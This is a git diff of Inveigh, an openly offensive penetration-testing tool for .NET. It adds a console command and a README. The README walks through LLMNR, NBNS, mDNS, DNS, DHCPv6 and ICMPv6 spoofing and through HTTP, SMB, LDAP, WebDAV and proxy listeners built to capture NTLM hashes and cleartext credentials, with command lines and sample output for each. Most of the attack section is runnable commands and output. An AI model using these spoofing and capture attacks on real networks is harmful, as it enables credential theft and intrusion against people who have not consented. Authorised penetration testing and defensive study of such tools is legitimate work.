REPLYTOHOSTS": @@ -475,6 +476,10 @@ namespace Inveigh Console.WriteLine(entry); break; + case "SET CONSOLE": + SetConsole(value); + break; + case "?": case "HELP": GetHelp(); @@ -547,7 +552,8 @@ namespace Inveigh commands.Add("GET IGNOREHOSTS,get IgnoreHosts parameter startup values"); commands.Add("GET IGNOREIPS,get IgnoreIPs parameter startup values"); commands.Add("GET IGNOREMACS,get IgnoreMACs parameter startup values"); - commands.Add("HISTORY,get console command history"); + commands.Add("SET CONSOLE,set Console parameter value"); + commands.Add("HISTORY,get command history"); commands.Add("RESUME,resume real time console output"); commands.Add("STOP,stop Inveigh"); Output.OutputCommand(description, headings, commands, Program.colorPositive); @@ -758,36 +764,37 @@ namespace Inveigh Output.OutputCommand(description, headers, list, Program.colorPositive); } - public static void GetSpooferReplyLists() + public static void SetConsole(string value) { - if (Program.ntlmv2UsernameList.Count > 0) - { - Console.WriteLine(string.Format("[+] [{0}] Current NTLMv2 IP addresses, hostnames, and usernames:", Output.Timestamp())); - string[] outputNTLMV2Usernames = Program.ntlmv2UsernameList.ToArray(); - foreach (string entry in outputNTLMV2Usernames) - Console.WriteLine(entry); - } - else + if (!string.IsNullOrEmpty(value)) { - Console.WriteLine(string.Format("[+] [{0}] NTLMv2 IP address, hostname, and username list is empty", Output.Timestamp())); - } - } + try + { + Int32.Parse(value); + int console = Int32.Parse(value); - public static void GetSpooferIgnoreLists() - { + if (console <= 5) + { + Program.console = console; + Output.OutputCommand("Console value set to " + value); + } + else + { + Output.OutputCommand("Value must be between 0 and 5"); + } + + } + catch + { + Output.OutputCommand("Value must be an integer"); + } - if (Program.ntlmv2UsernameList.Count > 0) - { - Console.WriteLine(string.Format("Current NTLMv2 IP addresses, hostnames, and usernames:", Output.Timestamp())); - string[] outputNTLMV2Usernames = Program.ntlmv2UsernameList.ToArray(); - foreach (string entry in outputNTLMV2Usernames) - Console.WriteLine(entry); } else { - Console.WriteLine(string.Format("[+] [{0}] NTLMv2 IP address, hostname, and username list is empty", Output.Timestamp())); + Output.OutputCommand("No value specified"); } } @@ -1,6 +1,6 @@ BSD 3-Clause License -Copyright (c) 2021, Kevin Robertson +Copyright (c) 2022, Kevin Robertson All rights reserved. Redistribution and use in source and binary forms, with or without diff --git a/README.md b/README.md new file mode 100644 index 0000000..fc352ec --- /dev/null +++ b/README.md @@ -0,0 +1,523 @@ +# Inveigh + +Inveigh is a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool for penetration testers. This repo contains the primary C# version as well as the legacy PowerShell version. + +## Overview + +Inveigh conducts spoofing attacks and hash/credential captures through both packet sniffing and protocol specific isteners/sockets. The packet sniffing method, which was the basis for the original Powershell version of this tool, has the following advantages: + +* SMB NTLM challenge/response captures over the Window's SMB service +* Fewer visible port binds on the host system + +The primary disadvantage is the required elevated access. + +On current versions of Windows, the default running UDP services allow port reuse. Therefore, packet sniffing no longer provides an advantage for getting around in-use UDP ports. Inveigh's UDP listeners are all configured to take advantage of port reuse. + +### Version Descriptions +* **PowerShell Inveigh** - original version developed over many years. For now at least, this version (1.506) will go without additional updates. Documentation can be found [here](https://github.com/Kevin-Robertson/Inveigh/wiki). +* **C# Inveigh (aka InveighZero)** - original C# POC code combined with a C# port of most of the Powershell version's code. This version has now been rebuilt for C# and is taking over as the primary version. For now, the InveighZero will continue to be udated with just the latest C# version as a download alternative to avoid AV flagging the Powershell code. + +### Features + +The C# version of Inveigh contains attacks for the following protocols: + +* [LLMNR](#LLMNR) [packet sniffer | listener] +* [DNS](#DNS) [packet sniffer | listener] +* [mDNS](#mDNS) [packet sniffer | listener] +* [NBNS](#NBNS) [packet sniffer | listener] +* [DHCPv6](#DHCPv6) [packet sniffer | listener] +* [ICMPv6](#ICMPv6) [privileged raw socket] +* [HTTP](#HTTP) [listener] +* [HTTPS](#HTTPS) [listener] +* [SMB](#SMB) [packet sniffer | listener] +* [LDAP](#LDAP) [listener] +* [WebDAV](#WebDAV) [listener] +* [Proxy Auth](#Proxy) [listener] + +Inveigh works with both IPv4 and IPv6 in cases where support for both is provided by the underlying protocol. + +## Cross-Platform Support + +Inveigh's SDK style project file is setup for .NET 3.5, 4.6.2, and 6.0 with 6.0 being the version that also works with Linux and macOS. + +`<TargetFrameworks>net35;net62;net6.0</TargetFrameworks>` + +### Known Issues + +* The packet sniffer is available only on Windows due to differences in the raw socket setups. When compiled for either Linux or macOS, the packet sniffer will just be disabled. Instead, Inveigh's SMB listener can be used if port 445 is open. +* macOS requires that routes are avalable for joining multicast groups. In my testing, I've had to add routes for DHCPv6 multicast in order to carry out that attack on this platform. + `sudo route -nv add -net ff02::1:2 -interface en0` + +### Execution + +`dotnet Inveigh.dll` + +### Linux/macOS Platform Targeted Builds + +* With .NET 6.0 installed on target system +`dotnet publish -r linux-x64 -f net6.0 -p:AssemblyName=inveigh` +`dotnet publish -r osx-x64 -f net6.0 -p:AssemblyName=inveigh` + +* Without .NET 6.0 installed on target system +`dotnet publish --self-contained=true -p:PublishSingleFile=true -r linux-x64 -f net6.0 -p:AssemblyName=inveigh` +`dotnet publish --self-contained=true -p:PublishSingleFile=true -r osx-x64 -f net6.0 -p:AssemblyName=inveigh` + +## Usage + +Default parameter values are located at the beginning of Program.cs. I recommend reviewing and setting everything to fit your needs before compile. All enable/disable parameters can be set with `Y/N` values. + +``` + //begin parameters - set defaults as needed before compile + public static string argCert = "MIIKaQIBAzCCC..." + public static string argCertPassword = "password"; + public static string argChallenge = ""; + public static string argConsole = "5"; + public static string argConsoleLimit = "-1"; + public static string argConsoleStatus = "0"; + public static string argConsoleUnique = "Y"; + public static string argDHCPv6 = "N"; + public static string argDHCPv6TTL = "30"; + public static string argDNS = "Y"; + ... + //end parameters +``` + +### Parameter Help + +``` +.\Inveigh.exe -? + +Control: + + -Inspect Default=Disabled: (Y/N) inspect traffic only. + + -IPv4 Default=Enabled: (Y/N) IPv4 spoofing/capture. + + -IPv6 Default=Enabled: (Y/N) IPv6 spoofing/capture. + + -RunCount Default=Unlimited: Number of NetNTLM captures to perform before auto-exiting. + + -RunTime Default=Unlimited: Run time duration in minutes. + + +Output: + + -Console Default=5: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no disabled, no informational, 3=no disabled, no filtered, 4=no disabled, 5=all) + + -ConsoleLimit Default=Unlimited: Limit to queued console entries. + + -ConsoleStatus Default=Disabled: Interval in minutes for auto-displaying capture details. + + -ConsoleUnique Default=Enabled: (Y/N) displaying only unique (user and system combination) hashes at time of capture. + + -FileDirectory Default=Working Directory: Valid path to an output directory for enabled file output. + + -FileOutput Default=Disabled: (Y/N) real time file output. + + -FilePrefix Default=Inveigh: Prefix for all output files. + + -FileUnique Default=Enabled: (Y/N) outputting only unique (user and system combination) hashes. + + -LogOutput Default=Disabled: (Y/N) outputting log entries. + + +Spoofers: + + -DHCPV6 Default=Disabled: (Y/N) DHCPv6 spoofing. + + -DHCPv6TTL Default=300: Lease lifetime in seconds. + + -DNS Default=Enabled: (Y/N) DNS spoofing. + + -DNSHost Fully qualified hostname to use SOA/SRV responses. + + -DNSSRV Default=LDAP: Comma separated list of SRV request services to answer. + + -DNSSuffix DNS search suffix to include in DHCPv6/ICMPv6 responses. + + -DNSTTL Default=30: DNS TTL in seconds. + + -DNSTYPES Default=A: (A, SOA, SRV) Comma separated list of DNS types to spoof. + + -ICMPv6 Default=Enabled: (Y/N) sending ICMPv6 router advertisements. + + -ICMPv6Interval Default=200: ICMPv6 RA interval in seconds. + + -ICMPv6TTL Default=300: ICMPv6 TTL in seconds. + + -IgnoreDomains Default=None: Comma separated list of domains to ignore when spoofing. + + -IgnoreHosts Default=None: Comma separated list of hostnames to ignore when spoofing. + + -IgnoreIPs Default=Local: Comma separated list of source IP addresses to ignore when spoofing. + + -IgnoreMACs Default=Local: Comma separated list of MAC addresses to ignore when DHCPv6 spoofing. + + -Local Default=Disabled: (Y/N) performing spoofing attacks against the host system. + + -LLMNR Default=Enabled: (Y/N) LLMNR spoofing. + + -LLMNRTTL Default=30: LLMNR TTL in seconds. + + -MAC Local MAC address for DHCPv6. + + -MDNS Default=Enabled: (Y/N) mDNS spoofing. + + -MDNSQuestions Default=QU,QM: Comma separated list of question types to spoof. (QU,QM) + + -MDNSTTL Default=120: mDNS TTL in seconds. + + -MDNSTypes Default=A: Comma separated list of mDNS record types to spoof. (A,AAAA,ANY) + + -MDNSUnicast Default=Enabled: (Y/N) sending a unicast only response to a QM request. + + -NBNS Default=Disabled: (Y/N) NBNS spoofing. + + -NBNSTTL Default=165: NBNS TTL in seconds. + + -NBNSTypes Default=00,20: Comma separated list of NBNS types to spoof. (00,03,20,1B) + + -ReplyToDomains Default=All: Comma separated list of domains to respond to when spoofing. + + -ReplyToHosts Default=All: Comma separated list of hostnames to respond to when spoofing. + + -ReplyToIPs Default=All: Comma separated list of source IP addresses to respond to when spoofing. + + -ReplyToMACs Default=All: Comma separated list of MAC addresses to respond to when DHCPv6 spoofing. + + -SpooferIP Default=Autoassign: IP address included in spoofing responses. + + -SpooferIPv6 Default=Autoassign: IPv6 address included in spoofing responses. + + -Repeat Default=Enabled: (Y/N) repeated spoofing attacks against a system after NetNTLM capture. + + +Capture: + + -Cert Base64 certificate for TLS. + + -CertPassword Base64 certificate password for TLS. + + -Challenge Default=Random per request: 16 character hex NetNTLM challenge for use with the TCP listeners. + + -HTTP Default=Enabled: (Y/N) HTTP listener. + + -HTTPAuth Default=NTLM: (Anonymous/Basic/NTLM) HTTP/HTTPS listener authentication. + + -HTTPPorts Default=80: Comma seperated list of TCP ports for the HTTP listener. + + -HTTPRealm Default=ADFS: Basic authentication realm. + + -HTTPResponse Content to serve as the default HTTP/HTTPS/Proxy response. + + -HTTPS Default=Enabled: (Y/N) HTTPS listener. + + -HTTPSPorts Default=443: Comma separated list of TCP ports for the HTTPS listener. + + -IgnoreAgents Default=Firefox: Comma separated list of HTTP user agents to ignore with wpad anmd proxy auth. + + -LDAP Default=Enabled: (Y/N) LDAP listener. + + -LDAPPorts Default=389: Comma separated list of TCP ports for the LDAP listener. + + -ListenerIP Default=Any: IP address for all listeners. + + -ListenerIPv6 Default=Any: IPv6 address for all listeners. + + -MachineAccount Default=Enabled: (Y/N) machine account NetNTLM captures. + + -Proxy Default=Disabled: (Y/N) proxy listener authentication captures. + + -ProxyAuth Default=NTLM: (Basic/NTLM) Proxy authentication. + + -ProxyPort Default=8492: Port for the proxy listener. + + -SMB Default=Enabled: (Y/N) SMB sniffer/listener. + + -SMBPorts Default=445: Port for the SMB listener. + + -SnifferIP Default=Autoassign: IP address included in spoofing responses. + + -SnifferIPv6 Default=Autoassign: IPv6 address included in spoofing responses. + + -WebDAV Default=Enabled: (Y/N) serving WebDAV over HTTP/HTTPS listener. + + -WebDAVAuth Default=NTLM: (Anonymous/Basic/NTLM) WebDAV authentication. + + -WPADAuth Default=Enabled: (Y/N) authentication type for wpad.dat requests. (Anonymous/Basic/NTLM) + + -WPADResponse Default=Autogenerated: Contents of wpad.dat responses. +``` +### Default (autodetect local IPs) +``` +.\Inveigh.exe +[*] Inveigh 2.0 [Started 2021-06-15T00:08:37 | PID 12588] +[+] Packet Sniffer Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2] +[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::] +[+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2] +[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled] +[-] DHCPv6 +[+] DNS Packet Sniffer [Type A] +[-] ICMPv6 +[+] LLMNR Packet Sniffer [Type A] +[-] MDNS +[-] NBNS +[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80] +[-] HTTPS +[+] WebDAV [WebDAVAuth NTLM] +[-] Proxy +[+] LDAP Listener [Port 389] +[+] SMB Packet Sniffer [Port 445] +[+] File Output [C:\Users\dev\source\repos\Inveigh\Inveigh\bin\Debug\net35] +[+] Previous Session Files [Imported] +[*] Press ESC to enter/exit interactive console +``` +### Listener Only Mode (disabled packet sniffer) +``` +.\Inveigh.exe -sniffer n +[*] Inveigh 2.0 [Started 2021-06-14T10:48:16 | PID 20368] +[-] Packet Sniffer +[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::] +[+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2] +[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled] +[-] DHCPv6 +[+] DNS Listener [Type A] +[-] ICMPv6 +[+] LLMNR Listener [Type A] +[-] MDNS +[-] NBNS +[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80] +[-] HTTPS +[+] WebDAV [WebDAVAuth NTLM] +[-] Proxy +[+] LDAP Listener [Port 389] +[+] SMB Listener [Port 445] +[+] File Output [C:\Users\dev\source\repos\InveighZero\Inveigh\bin\Debug\net35] +[+] Previous Session Files [Imported] +[*] Press ESC to enter/exit interactive console +[!] Failed to start SMB listener on port 445, check IP and port usage. +[!] Failed to start SMB listener on port 445, check IP and port usage. +``` +Note, with the packet sniffer disabled, Inveigh will attempt to start SMB listeners for IPv4 and IPv6. On most windows systems, port 445 will already be in use. Either ignore error or add `-smb n`. + +### <a name="DHCPv6"></a>DHCPv6 + +Start DHCPv6 spoofer and IPv6 DNS spoofer. Note, DNS is on by default. +``` +.\Inveigh.exe -dhcpv6 y +... +[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53] +[+] DNS Listener [Type A] +... +[+] [23:03:06] DHCPv6 [solicitation] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent] +[+] [23:03:06] DHCPv6 [fe80::1348:1] advertised to [00:0C:29:F0:6E:16] +[+] [23:03:06] DHCPv6 [request] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent] +[+] [23:03:06] DHCPv6 [fe80::1348:1] leased to [00:0C:29:F0:6E:16] +``` +Start DHCPv6 spoofer and spoof DNS requests for internal domain only. +``` +.\Inveigh.exe -dhcpv6 y -replytodomains lab.inveigh.org +... +[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53] +[+] DNS Listener [Type A] +... +[-] [23:10:30] DNS(A) request [test.inveigh.org] from fe80::6142:1%2 [domain ignored] +[+] [23:10:33] DNS(A) request [wpad.lab.inveigh.org] from fe80::6142:1%2 [response sent] +``` +Start DHCPv6 spoofer and also send out ICMPv6 RA packets. +``` +.\Inveigh.exe -dhcpv6 y -icmpv6 y +... +[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53] +[+] DNS Listener [Type A] +[+] ICMPv6 Router Advertisement [Interval 200 Seconds] +... +[+] [23:12:04] ICMPv6 router advertisment sent to [ff02::1] +``` +Start DHCPv6 spoofer and answer requests from the local host. +``` +.\Inveigh.exe -dhcpv6 y -local y +... +[+] Spoofer Options [Repeat Enabled | Local Attacks Enabled] +[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53] +``` +### <a name="DNS"></a>DNS +Spoof SRV requests in addition to A. +``` +.\Inveigh.exe -dnstypes A,SRV -dnshost fake.lab.inveigh.org +... +[+] DNS Listener [Types A:SRV] +... +[+] [23:21:05] DNS(SRV) request [_ldap._tcp.dc._msdcs.lab.inveigh.org] from fe80::242d:f99e:7534:b46f%2 [response sent] +``` +### <a name="ICMPv6"></a>ICMPv6 +Send ICMPv6 packets to inject a secondary IPv6 DNS server on local subnet systems. +``` +.\Inveigh.exe -icmpv6 y +... +[+] ICMPv6 Router Advertisement [Option DNS | Interval 200 Seconds] +... +[+] [23:35:46] ICMPv6 router advertisement with DNSv6 sent to [ff02::1] +``` +Send ICMPv6 packets to inject an additional DNS search suffix on local subnet systems. +``` +.\Inveigh.exe -icmpv6 y -dnssuffix inveigh.net +... +[+] ICMPv6 Router Advertisement [Option DNS Suffix | Interval 200 Seconds] +... +[+] [23:41:17] ICMPv6 router advertisement with DNS Suffix sent to [ff02::1] +``` +### <a name="LLMNR"></a>LLMNR +Spoof AAAA requests instead of A. +``` +.\Inveigh.exe -llmnrtypes AAAA +... +[+] LLMNR Listener [Type AAAA] +... +[-] [23:23:38] LLMNR(A) request [test] from fe80::bd92:a800:60d0:8deb%2 [type ignored] +[-] [23:23:38] LLMNR(A) request [test] from 10.10.2.201 [type ignored] +[+] [23:23:38] LLMNR(AAAA) request [test] from 10.10.2.201 [response sent] +[+] [23:23:38] LLMNR(AAAA) request [test] from fe80::bd92:a800:60d0:8deb%2 [response sent] +``` +### <a name="mDNS"></a>mDNS +Start mDNS spoofer and send unicast responses to QM requests. +``` +.\Inveigh.exe -mdns y +... +[+] MDNS Listener [Questions QU:QM | Type A] +... +[+] [23:25:58] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent] +[+] [23:25:58] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent] +[-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from 10.10.2.201 [type ignored] +[-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [type ignored] +``` +Start mDNS spoofer and send multicast responses to QM requests. +``` +.\Inveigh.exe -mdns y -mdnsunicast n +... +[+] MDNS Listener [Questions QU:QM | Type A] +... +[+] [23:28:26] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent] +[+] [23:28:26] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent] +``` +### <a name="NBNS"></a>NBNS +Start NBNS spoofer +``` +.\Inveigh.exe -nbns y +... +[+] NBNS Listener [Types 00:20] +... +[+] [23:33:09] NBNS(00) request [TEST] from 10.10.2.201 [response sent] +``` +### <a name="HTTP"></a>HTTP +Start HTTP listener on port 80 (enabled by default) +``` +.\Inveigh.exe +... +[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80] +... +``` +Start HTTP listeners on multiple ports +``` +.\Inveigh.exe -httpports 80,8080 +... +[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Ports 80:8080] +... +``` +### <a name="HTTPS"></a>HTTPS +Start HTTPS listener on port 443 with Inveigh's default cert +``` +.\Inveigh.exe -https y +... +[+] HTTPS Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 443] +... +``` +### <a name="SMB"></a>SMB +Start SMB packet sniffer (enabled by default) +``` +.\Inveigh.exe +... +[+] SMB Packet Sniffer [Port 445] +... +``` +Start SMB listener on port 445 +``` +.\Inveigh.exe -sniffer n +... +[+] SMB Listener [Port 445] +... +``` +### <a name="LDAP"></a>LDAP +Start LDAP listener on port 389 +``` +.\Inveigh.exe +... +[+] LDAP Listener [Port 389] +... +``` +### <a name="WebDAV"></a>WebDAV +Start the HTTP listener with WebDAV support (enabled by default) +``` +.\Inveigh.exe +... +[+] WebDAV [WebDAVAuth NTLM] +... +``` +### <a name="Proxy"></a>Proxy Auth +Enable proxy auth capture on port 8492 +``` +.\Inveigh.exe -proxy y +... +[+] Proxy Listener [ProxyAuth NTLM | Port 8492] +... +``` +## Console + +Inveigh contains a console that is accessible while the tool is running (hit escape to enter and exit). The console provides easy access to captured credentials/hashes and other various information. The console's prompt provides real-time updates for cleartext, NTLMv1, and NTLMv2 captue counts in the format of unique:total. Note, the console may be inaccessible when running through C2. + +### Interactive Console Help - enter ? or HELP + +``` +=============================================== Inveigh Console Commands =============================================== + +Command Description +======================================================================================================================== +GET CONSOLE | get queued console output +GET DHCPv6Leases | get DHCPv6 assigned IPv6 addresses +GET LOG | get log entries; add search string to filter results +GET NTLMV1 | get captured NTLMv1 hashes; add search string to filter results +GET NTLMV2 | get captured NTLMv2 hashes; add search string to filter results +GET NTLMV1UNIQUE | get one captured NTLMv1 hash per user; add search string to filter results +GET NTLMV2UNIQUE | get one captured NTLMv2 hash per user; add search string to filter results +GET NTLMV1USERNAMES | get usernames and source IPs/hostnames for captured NTLMv1 hashes +GET NTLMV2USERNAMES | get usernames and source IPs/hostnames for captured NTLMv2 hashes +GET CLEARTEXT | get captured cleartext credentials +GET CLEARTEXTUNIQUE | get unique captured cleartext credentials +GET REPLYTODOMAINS | get ReplyToDomains parameter startup values +GET REPLYTOHOSTS | get ReplyToHosts parameter startup values +GET REPLYTOIPS | get ReplyToIPs parameter startup values +GET REPLYTOMACS | get ReplyToMACs parameter startup values +GET IGNOREDOMAINS | get IgnoreDomains parameter startup values +GET IGNOREHOSTS | get IgnoreHosts parameter startup values +GET IGNOREIPS | get IgnoreIPs parameter startup values +GET IGNOREMACS | get IgnoreMACs parameter startup values +SET CONSOLE | set Console parameter value +HISTORY | get command history +RESUME | resume real time console output +STOP | stop Inveigh +``` +### Interactive Console Prompt +The console prompt contains real time capture counts. +``` +C(0:0) NTLMv1(0:0) NTLMv2(0:0)> +``` +Cleartext(unique:total) NTLMv1(unique:total) NTLMv2(unique:total) + +## Quiddity + +The protocol library used by Inveigh is located [here](https://github.com/Kevin-Robertson/Quiddity). + +## Special Thanks +* Responder - https://github.com/lgandx/Responder +* Impacket - https://github.com/SecureAuthCorp/impacket +* mitm6 - https://github.com/fox-it/mitm6 |